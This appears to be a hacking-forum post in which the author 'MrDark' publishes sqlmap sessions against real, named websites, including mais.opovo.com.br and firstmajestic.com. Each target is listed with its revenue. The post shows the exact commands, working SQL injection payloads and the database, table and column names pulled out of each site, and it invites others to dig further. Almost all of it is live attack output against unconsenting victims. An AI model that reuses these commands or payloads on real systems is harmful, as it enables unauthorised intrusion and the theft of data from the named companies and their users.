    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: zen_sync_wallets
[6 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| id                   | int      |
| last_sync_address    | text     |
| last_sync_date       | datetime |
| last_sync_userid     | text     |
| last_sync_walletname | text     |
| updated              | datetime |
+----------------------+----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: zen_zend_balances
[6 columns]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| balance  | float     |
| created  | datetime  |
| id       | int       |
| updated  | timestamp |
| userid   | text      |
| username | text      |
+----------+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: zengames_numbergen
[11 columns]
+--------------------+-------------+
| Column             | Type        |
+--------------------+-------------+
| status             | varchar(20) |
| created            | int         |
| duration           | int         |
| entries            | text        |
| entries_message_id | text        |
| game_channel_id    | text        |
| id                 | int         |
| maxnumbergenerated | int         |
| prize              | text        |
| updated            | timestamp   |
| winners            | text        |
+--------------------+-------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: trait (POST)
    Type: inline query
    Title: Generic inline queries
    Payload: collectionid=stars10w3px52pqcnnx9jt0gr04p6ztdhqc5wq9sdeqjzc43k6pxhut69qzpzf0y&tablename=nfts_binjas&task=getTraitValues&trait=(SELECT CONCAT(CONCAT(0x71766b7671,(CASE WHEN (5654=5654) THEN 0x31 ELSE 0x30 END)),0x71706b7671))
---
web application technology: PHP
back-end DBMS: MySQL >= 8.0.0
Database: sganalytics
Table: nfts_acrenft
[23 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| name           | text         |
| background     | text         |
| base           | text         |
| base_token_uri | text         |
| collectionid   | varchar(100) |
| created        | timestamp    |
| id             | int          |
| imgurl         | text         |
| isListed       | varchar(10)  |
| lastlistprice  | float        |
| lastsaleprice  | float        |
| lifeabove      | text         |
| lifebelow      | text         |
| listingupdated | varchar(10)  |
| listprice      | float        |
| microorganism  | text         |
| nftrank        | int          |
| rankpoints     | float        |
| rarityscore    | decimal(8,5) |
| sys_id         | varchar(100) |
| tokenid        | int          |
| tree           | text         |
| updated        | timestamp    |
+----------------+--------------+

MrDark · 17.11.2025

Website www.opovo.com.br

Revenue $213.7 Million

https://www.zoominfo.com/c/o-povo-online/79889885

available databases [11]:
[*] compara_db
[*] information_schema
[*] integracaohomo_db
[*] mysql
[*] opovo2_db
[*] opovo_db
[*] opovohomo2_db
[*] opovohomo3_db
[*] opovohomo_db
[*] performance_schema
[*] sys

Since many tables didn't spend time searching for user table.

Код:

(myenv) root@E02S29:~/gd# sqlmap -u "https://mais.opovo.com.br/flip/index.php?cd_catpr=1&cd_prded=1&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search"        -p cd_prded        --batch        --level=3        --risk=2 --random-agent --tamper=space2comment --dbs --threads=10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.10#pip}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:09:42 /2025-11-17/

[07:09:42] [INFO] loading tamper module 'space2comment'
[07:09:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15' from file '/root/gd/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:09:42] [INFO] resuming back-end DBMS 'mysql'
[07:09:42] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=reugk39n51p...dpojbccsas'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cd_prded (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cd_catpr=1&cd_prded=1 AND 3398=3398&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cd_catpr=1&cd_prded=1 AND (SELECT 8768 FROM (SELECT(SLEEP(5)))XZbW)&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search
---
[07:09:44] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[07:09:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[07:09:44] [INFO] fetching database names
[07:09:44] [INFO] fetching number of databases
[07:09:46] [INFO] resumed: 11
[07:09:46] [INFO] retrieving the length of query output
[07:09:46] [INFO] retrieved:
[07:09:49] [WARNING] reflective value(s) found and filtering out
18
[07:10:22] [INFO] retrieved: information_schema
[07:10:22] [INFO] retrieving the length of query output
[07:10:22] [INFO] retrieved: 10
[07:10:43] [INFO] retrieved: compara_db
[07:10:43] [INFO] retrieving the length of query output
[07:10:43] [INFO] retrieved: 17
[07:11:14] [INFO] retrieved: integracaohomo_db
[07:11:14] [INFO] retrieving the length of query output
[07:11:14] [INFO] retrieved: 5
[07:11:30] [INFO] retrieved: mysql
[07:11:30] [INFO] retrieving the length of query output
[07:11:30] [INFO] retrieved: 9
[07:11:53] [INFO] retrieved: opovo2_db
[07:11:53] [INFO] retrieving the length of query output
[07:11:53] [INFO] retrieved: 8
[07:12:11] [INFO] retrieved: opovo_db
[07:12:11] [INFO] retrieving the length of query output
[07:12:11] [INFO] retrieved: 13
[07:12:40] [INFO] retrieved: opovohomo2_db
[07:12:40] [INFO] retrieving the length of query output
[07:12:40] [INFO] retrieved: 13
[07:13:08] [INFO] retrieved: opovohomo3_db
[07:13:08] [INFO] retrieving the length of query output
[07:13:08] [INFO] retrieved: 12
[07:13:36] [INFO] retrieved: opovohomo_db
[07:13:36] [INFO] retrieving the length of query output
[07:13:36] [INFO] retrieved: 18
[07:14:08] [INFO] retrieved: performance_schema
[07:14:08] [INFO] retrieving the length of query output
[07:14:08] [INFO] retrieved: 3
[07:14:21] [INFO] retrieved: sys
available databases [11]:
[*] compara_db
[*] information_schema
[*] integracaohomo_db
[*] mysql
[*] opovo2_db
[*] opovo_db
[*] opovohomo2_db
[*] opovohomo3_db
[*] opovohomo_db
[*] performance_schema
[*] sys

[07:14:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/mais.opovo.com.br'

[*] ending @ 07:14:21 /2025-11-17/

(myenv) root@E02S29:~/gd# sqlmap -u "https://mais.opovo.com.br/flip/index.php?cd_catpr=1&cd_prded=1&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search"        -p cd_prded        --batch        --level=3        --risk=2 --random-agent --tamper=space2comment --threads=10 -D opovo_db --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.10#pip}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:22:23 /2025-11-17/

[07:22:23] [INFO] loading tamper module 'space2comment'
[07:22:23] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' from file '/root/gd/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:22:23] [INFO] resuming back-end DBMS 'mysql'
[07:22:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9b7ueftipm7...578a4cgkvj'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cd_prded (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cd_catpr=1&cd_prded=1 AND 3398=3398&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cd_catpr=1&cd_prded=1 AND (SELECT 8768 FROM (SELECT(SLEEP(5)))XZbW)&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search
---
[07:22:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[07:22:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP, Nginx
back-end DBMS: MySQL >= 5.0.12
[07:22:25] [INFO] fetching tables for database: 'opovo_db'
[07:22:25] [INFO] fetching number of tables for database 'opovo_db'
[07:22:27] [INFO] retrieved:
[07:22:30] [WARNING] reflective value(s) found and filtering out
342
[07:22:46] [INFO] retrieving the length of query output
[07:22:46] [INFO] retrieved: 5
[07:23:02] [INFO] retrieved: acins
[07:23:02] [INFO] retrieving the length of query output
[07:23:02] [INFO] retrieved: 3
[07:23:16] [INFO] retrieved: ads
[07:23:16] [INFO] retrieving the length of query output
[07:23:16] [INFO] retrieved: 8
[07:23:35] [INFO] retrieved: adsafila
[07:23:35] [INFO] retrieving the length of query output
[07:23:35] [INFO] retrieved: 5
[07:23:50] [INFO] retrieved: adsan
[07:23:50] [INFO] retrieving the length of query output
[07:23:50] [INFO] retrieved: 8
[07:24:08] [INFO] retrieved: adsassin
[07:24:08] [INFO] retrieving the length of query output
[07:24:08] [INFO] retrieved: 8
[07:24:26] [INFO] retrieved: adsbadid
[07:24:26] [INFO] retrieving the length of query output
[07:24:26] [INFO] retrieved: 7
[07:24:43] [INFO] retrieved: adsbanc
[07:24:43] [INFO] retrieving the length of query output
[07:24:43] [INFO] retrieved: 8
[07:25:01] [INFO] retrieved: adscagru
[07:25:01] [INFO] retrieving the length of query output
[07:25:01] [INFO] retrieved: 8
[07:25:21] [INFO] retrieved: adscapta
[07:25:21] [INFO] retrieving the length of query output
[07:25:21] [INFO] retrieved: 8
[07:25:40] [INFO] retrieved: adscbcom
[07:25:40] [INFO] retrieving the length of query output
[07:25:40] [INFO] retrieved: 8
[07:26:00] [INFO] retrieved: adscbqem
[07:26:00] [INFO] retrieving the length of query output
[07:26:00] [INFO] retrieved: 8
[07:26:18] [INFO] retrieved: adscbqnd
[07:26:18] [INFO] retrieving the length of query output
[07:26:18] [INFO] retrieved: 8
[07:26:37] [INFO] retrieved: adscfila
[07:26:37] [INFO] retrieving the length of query output
[07:26:37] [INFO] retrieved: 8
[07:27:00] [INFO] retrieved: adscontr
[07:27:00] [INFO] retrieving the length of query output
[07:27:00] [INFO] retrieved: 10
[07:27:24] [INFO] retrieved: adscontran
[07:27:24] [INFO] retrieving the length of query output
[07:27:24] [INFO] retrieved: 8
[07:27:40] [INFO] retrieved: adsempre
[07:27:40] [INFO] retrieving the length of query output
[07:27:40] [INFO] retrieved: 8
[07:27:59] [INFO] retrieved: adsestlo
[07:27:59] [INFO] retrieving the length of query output
[07:27:59] [INFO] retrieved: 8
[07:28:16] [INFO] retrieved: adsestse
[07:28:16] [INFO] retrieving the length of query output
[07:28:16] [INFO] retrieved: 8
[07:28:34] [INFO] retrieved: adsfield
[07:28:34] [INFO] retrieving the length of query output
[07:28:34] [INFO] retrieved: 8
[07:28:50] [INFO] retrieved: adsfigru
[07:28:50] [INFO] retrieving the length of query output
[07:28:50] [INFO] retrieved: 8
[07:29:08] [INFO] retrieved: adsfilaa
[07:29:08] [INFO] retrieving the length of query output
[07:29:08] [INFO] retrieved: 8
[07:29:26] [INFO] retrieved: adsfilac
[07:29:26] [INFO] retrieving the length of query output
[07:29:26] [INFO] retrieved: 8
[07:29:44] [INFO] retrieved: adsflanu
[07:29:44] [INFO] retrieving the length of query output
[07:29:44] [INFO] retrieved: 9
[07:30:02] [INFO] retrieved: adsfldest
[07:30:02] [INFO] retrieving the length of query output
[07:30:02] [INFO] retrieved: 5
[07:30:17] [INFO] retrieved: adsfo
[07:30:17] [INFO] retrieving the length of query output
[07:30:17] [INFO] retrieved: 8
[07:30:35] [INFO] retrieved: adsforto
[07:30:35] [INFO] retrieving the length of query output
[07:30:35] [INFO] retrieved: 8
[07:30:52] [INFO] retrieved: adsinter
[07:30:52] [INFO] retrieving the length of query output
[07:30:52] [INFO] retrieved: 5
[07:31:06] [INFO] retrieved: adsjo
[07:31:06] [INFO] retrieving the length of query output
[07:31:06] [INFO] retrieved: 6
[07:31:21] [INFO] retrieved: adsjod
[07:31:21] [INFO] retrieving the length of query output
[07:31:21] [INFO] retrieved: 8
[07:31:39] [INFO] retrieved: adslanca
[07:31:39] [INFO] retrieving the length of query output
[07:31:39] [INFO] retrieved: 11
[07:32:05] [INFO] retrieved: adslancactr
[07:32:05] [INFO] retrieving the length of query output
[07:32:05] [INFO] retrieved: 5
[07:32:22] [INFO] retrieved: adsmd
[07:32:22] [INFO] retrieving the length of query output
[07:32:22] [INFO] retrieved: 8
[07:32:40] [INFO] retrieved: adsmdsta
[07:32:40] [INFO] retrieving the length of query output
[07:32:40] [INFO] retrieved: 8
[07:32:58] [INFO] retrieved: adsmedda
[07:32:58] [INFO] retrieving the length of query output
[07:32:58] [INFO] retrieved: 7
[07:33:14] [INFO] retrieved: adsnamd
[07:33:14] [INFO] retrieving the length of query output
[07:33:14] [INFO] retrieved: 8
[07:33:32] [INFO] retrieved: adsnaten
[07:33:32] [INFO] retrieving the length of query output
[07:33:33] [INFO] retrieved: 8
[07:33:50] [INFO] retrieved: adsncomp
[07:33:50] [INFO] retrieving the length of query output
[07:33:50] [INFO] retrieved: 8
[07:34:08] [INFO] retrieved: adsnfila
[07:34:08] [INFO] retrieving the length of query output
[07:34:08] [INFO] retrieved: 7
[07:34:25] [INFO] retrieved: adsnqem
[07:34:25] [INFO] retrieving the length of query output
[07:34:25] [INFO] retrieved: 8
[07:34:44] [INFO] retrieved: adsoranu
[07:34:44] [INFO] retrieving the length of query output
[07:34:44] [INFO] retrieved: 8
[07:35:02] [INFO] retrieved: adsorder
[07:35:03] [INFO] retrieving the length of query output
[07:35:03] [INFO] retrieved: 5
[07:35:17] [INFO] retrieved: adspd
[07:35:17] [INFO] retrieving the length of query output
[07:35:17] [INFO] retrieved: 8
[07:35:34] [INFO] retrieved: adsplain
[07:35:34] [INFO] retrieving the length of query output
[07:35:34] [INFO] retrieved: 8
[07:35:53] [INFO] retrieved: adspopes
[07:35:53] [INFO] retrieving the length of query output
[07:35:53] [INFO] retrieved: 8
[07:36:13] [INFO] retrieved: adsporta
[07:36:13] [INFO] retrieving the length of query output
[07:36:13] [INFO] retrieved: 8
[07:36:31] [INFO] retrieved: adsposic
[07:36:31] [INFO] retrieving the length of query output
[07:36:31] [INFO] retrieved: 8
[07:36:49] [INFO] retrieved: adsprdre
[07:36:49] [INFO] retrieving the length of query output
[07:36:49] [INFO] retrieved: 8
[07:37:06] [INFO] retrieved: adspromo
[07:37:06] [INFO] retrieving the length of query output
[07:37:06] [INFO] retrieved: 8
[07:37:23] [INFO] retrieved: adssbest
[07:37:23] [INFO] retrieving the length of query output
[07:37:23] [INFO] retrieved: 8
[07:37:41] [INFO] retrieved: adsstatu
[07:37:41] [INFO] retrieving the length of query output
[07:37:41] [INFO] retrieved: 8
[07:38:04] [INFO] retrieved: adstbfat
[07:38:04] [INFO] retrieving the length of query output
[07:38:04] [INFO] retrieved: 8
[07:38:23] [INFO] retrieved: adstbpch
[07:38:23] [INFO] retrieving the length of query output
[07:38:23] [INFO] retrieved: 8
[07:38:41] [INFO] retrieved: adstbpfd
[07:38:41] [INFO] retrieving the length of query output
[07:38:41] [INFO] retrieved: 8
[07:39:01] [INFO] retrieved: adstbpre
[07:39:01] [INFO] retrieving the length of query output
[07:39:01] [INFO] retrieved: 7
[07:39:19] [INFO] retrieved: adstbvg
[07:39:19] [INFO] retrieving the length of query output
[07:39:19] [INFO] retrieved: 8
[07:39:40] [INFO] retrieved: adstpacc
[07:39:40] [INFO] retrieving the length of query output
[07:39:40] [INFO] retrieved: 10
[07:40:01] [INFO] retrieved: adstpcards
[07:40:01] [INFO] retrieving the length of query output
[07:40:01] [INFO] retrieved: 8
[07:40:19] [INFO] retrieved: adstpcgr
[07:40:19] [INFO] retrieving the length of query output
[07:40:19] [INFO] retrieved: 8
[07:40:37] [INFO] retrieved: adstpcli
[07:40:37] [INFO] retrieving the length of query output
[07:40:37] [INFO] retrieved: 9
[07:40:56] [INFO] retrieved: adstpclin
[07:40:56] [INFO] retrieving the length of query output
[07:40:56] [INFO] retrieved: 9
[07:41:16] [INFO] retrieved: adstpclpg
[07:41:16] [INFO] retrieving the length of query output
[07:41:16] [INFO] retrieved: 8
[07:41:34] [INFO] retrieved: adstpcls
[07:41:34] [INFO] retrieving the length of query output
[07:41:34] [INFO] retrieved: 8
[07:41:51] [INFO] retrieved: adstpcpr
[07:41:51] [INFO] retrieving the length of query output
[07:41:51] [INFO] retrieved: 8
[07:42:08] [INFO] retrieved: adstpcsg
[07:42:08] [INFO] retrieving the length of query output
[07:42:16] [CRITICAL] can't establish SSL connection

[*] ending @ 07:42:16 /2025-11-17/

(myenv) root@E02S29:~/gd# sqlmap -u "https://mais.opovo.com.br/flip/index.php?cd_catpr=1&cd_prded=1&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search"        -p cd_prded        --batch        --level=3        --risk=2 --random-agent --tamper=space2comment --threads=10 -D opovo_db --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.10#pip}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:42:23 /2025-11-17/

[07:42:23] [INFO] loading tamper module 'space2comment'
[07:42:23] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' from file '/root/gd/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:42:23] [INFO] resuming back-end DBMS 'mysql'
[07:42:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=015dm0jpsai...cimiohlev1'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cd_prded (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cd_catpr=1&cd_prded=1 AND 3398=3398&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cd_catpr=1&cd_prded=1 AND (SELECT 8768 FROM (SELECT(SLEEP(5)))XZbW)&dtEdcaoFim=16/11/2025&dtEdcaoIni=17/08/2025&e=S&search=search
---
[07:42:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[07:42:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[07:42:25] [INFO] fetching tables for database: 'opovo_db'
[07:42:25] [INFO] fetching number of tables for database 'opovo_db'
[07:42:27] [INFO] resumed: 342
[07:42:27] [INFO] retrieving the length of query output
[07:42:27] [INFO] resumed: 5
Database: opovo_db
[342 tables]
+--------------------+
| acins              |
| ads                |
| adsafila           |
| adsan              |
| adsassin           |
| adsbadid           |
| adsbanc            |
| adscagru           |
| adscapta           |
| adscbcom           |
| adscbqem           |
| adscbqnd           |
| adscfila           |
| adscontr           |
| adscontran         |
| adsempre           |
| adsestlo           |
| adsestse           |
| adsfield           |
| adsfigru           |
| adsfilaa           |
| adsfilac           |
| adsflanu           |
| adsfldest          |
| adsfo              |
| adsforto           |
| adsinter           |
| adsjo              |
| adsjod             |
| adslanca           |
| adslancactr        |
| adsmd              |
| adsmdsta           |
| adsmedda           |
| adsnamd            |
| adsnaten           |
| adsncomp           |
| adsnfila           |
| adsnqem            |
| adsoranu           |
| adsorder           |
| adspd              |
| adsplain           |
| adspopes           |
| adsporta           |
| adsposic           |
| adsprdre           |
| adspromo           |
| adssbest           |
| adsstatu           |
| adstbfat           |
| adstbpch           |
| adstbpfd           |
| adstbpre           |
| adstbvg            |
| adstpacc           |
| adstpcards         |
| adstpcgr           |
| adstpcli           |
| adstpclin          |
| adstpclpg          |
| adstpcls           |
| adstpcpr           |
| adstpcsg           |
| adstpinv           |
| adstppag           |
| adsvalfe           |
| adsvc              |
| adsvl              |
| agedi              |
| agend              |
| agmat              |
| agnot              |
| agnpt              |
| album              |
| ancio              |
| anunc              |
| anurd              |
| apmsg              |
| arias              |
| arint              |
| artis              |
| assjo              |
| atvas              |
| autmt              |
| autor              |
| bairr              |
| banca              |
| banjo              |
| bibli              |
| campa              |
| cargu              |
| catan              |
| catgu              |
| catmt              |
| catpf              |
| catpg              |
| catpr              |
| catvl              |
| ccurs              |
| cecus              |
| chmsg              |
| ciade              |
| cielo              |
| citno              |
| code_verification  |
| comma              |
| compos             |
| conat              |
| concu              |
| conta              |
| cores              |
| count_sql          |
| cpeqp              |
| cpetp              |
| cpgeq              |
| cpgra              |
| cpgru              |
| cpjog              |
| cpnat              |
| cpneq              |
| cpteq              |
| cremd              |
| cron               |
| ctraj              |
| ctrjo              |
| czone              |
| del_rsync          |
| despr              |
| devel              |
| dlart              |
| dvice              |
| edcao              |
| edcao_arq          |
| edgru              |
| edipt              |
| ednal              |
| edown              |
| edria              |
| emlrs              |
| empre              |
| endaj              |
| enqte              |
| esgui              |
| estat              |
| estdo              |
| estfc              |
| estid              |
| estlo              |
| esync              |
| evmai              |
| evntr              |
| fcprf              |
| fecon              |
| fgpgto             |
| filme              |
| fldmd              |
| foads              |
| fonte              |
| forma              |
| fpgla              |
| fpgto              |
| fpgui              |
| frmpg              |
| fugru              |
| fusis              |
| gener              |
| grdpg              |
| grued              |
| grugi              |
| grusu              |
| guia               |
| guict              |
| gusis              |
| higit              |
| hmati              |
| htmpl              |
| idsrv              |
| indff              |
| inftp              |
| insco              |
| itbbl              |
| itemi              |
| itepd              |
| itlby              |
| joass              |
| jonal              |
| lanca              |
| libry              |
| locut              |
| logac              |
| logad              |
| logaj              |
| logbd              |
| loged              |
| logem              |
| loger              |
| logfe              |
| logpd              |
| logsc              |
| logsp              |
| logsq              |
| logus              |
| lojas              |
| marel              |
| marep              |
| materiasnotfound   |
| matia              |
| matia_duplicada    |
| mdchk              |
| mdcro              |
| menuj              |
| midia              |
| midiaf             |
| midma              |
| midst              |
| model              |
| msgpd              |
| mstre              |
| mtger              |
| mtler              |
| newsl              |
| notia              |
| opovo_repub        |
| opovo_site_comp    |
| pagse              |
| pais               |
| parla              |
| pasit              |
| passjo             |
| pauta              |
| paypa              |
| pbsit              |
| pdcao              |
| pdcao_exclu        |
| pdchk              |
| pdest              |
| pdfch              |
| pdfrm              |
| pdmat              |
| pdmck              |
| pdmid              |
| pdmod              |
| pdpdf              |
| pdsta              |
| pedst              |
| pghor              |
| pgrad              |
| pjson              |
| plays              |
| poral              |
| prded              |
| prdjo              |
| prefc              |
| prfct              |
| prfec              |
| prfor              |
| prgan              |
| prgrd              |
| produ              |
| prola              |
| promc              |
| promo              |
| prper              |
| prprd              |
| prres              |
| prrus              |
| prsor              |
| prusu              |
| publi              |
| pusdv              |
| pused              |
| putip              |
| rddif              |
| redso              |
| refer              |
| relevmatia         |
| resen              |
| retca              |
| ropse              |
| rsfec              |
| rsync              |
| secfi              |
| secgu              |
| sesit              |
| session_assjo      |
| setem              |
| setin              |
| setip              |
| sisma              |
| sitad              |
| sitag              |
| sitanly            |
| site               |
| site_update        |
| sited              |
| sitfe              |
| sitgu              |
| sphinx             |
| statu              |
| stchk              |
| stfin              |
| stfrm              |
| stgru              |
| stred              |
| tagmt              |
| tags               |
| tags_excluir       |
| tammi              |
| templ              |
| teste              |
| tetag              |
| tkacs              |
| tpart              |
| tpblo              |
| tpcag              |
| tpcon              |
| tpend              |
| tpeve              |
| tpgui              |
| tplat              |
| tpmid              |
| tpvag              |
| treal              |
| trtmt              |
| txtpd              |
| urlst              |
| usftp              |
| usprd              |
| usuas              |
| usujo              |
| usupo              |
| ususi              |
| usute              |
| utmcontent         |
| utmcontent_spartan |
| vised              |
| visma              |
| vispd              |
| votma              |
| vw_utm_materia     |
| x                  |
+--------------------+

[12:13:51] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/mais.opovo.com.br'

MrDark · 17.11.2025

Website www.firstmajestic.com

Revenue $514.8 Million

available databases [4]:
[*] firstmaj_com
[*] information_schema
[*] test
[*] test_sandstormgold_com

https://www.zoominfo.com/c/first-majestic-silver-corp/33950796

Since it's too slow , i won't spend time in getting more information from the database, I will let you guys do it and discover what is inside.

Код:

(myenv) root@D04S16:~/gd/extract# sqlmap -u "https://firstmajestic.com/ajax/"        --data="email=testing@example.com&g-recaptcha-response=1&name=qeNtfPNC&submit="        -p name        --batch        --level=3        --risk=2        --dbms=mysql        --technique=T        --time-sec=1        --threads=10        --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.10#pip}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:58:14 /2025-11-17/

[13:58:14] [INFO] flushing session file
[13:58:14] [INFO] testing connection to the target URL
[13:58:15] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:58:17] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable
[13:58:18] [INFO] testing for SQL injection on POST parameter 'name'
[13:58:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:58:18] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[13:58:45] [INFO] POST parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[13:58:45] [INFO] checking if the injection point on POST parameter 'name' is a false positive
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 54 HTTP(s) requests:
---
Parameter: name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=testing@example.com&g-recaptcha-response=1&name=qeNtfPNC' AND (SELECT 5171 FROM (SELECT(SLEEP(1)))AIxl) AND 'GlNU'='GlNU&submit=
---
[13:59:06] [INFO] the back-end DBMS is MySQL
[13:59:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[13:59:07] [INFO] fetching database names
[13:59:07] [INFO] fetching number of databases
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[13:59:07] [INFO] retrieved: 4
[13:59:14] [INFO] retrieved: information_schema
[14:01:50] [INFO] retrieved: firstm
[14:03:04] [ERROR] invalid character detected. retrying..
[14:03:12] [ERROR] invalid character detected. retrying..
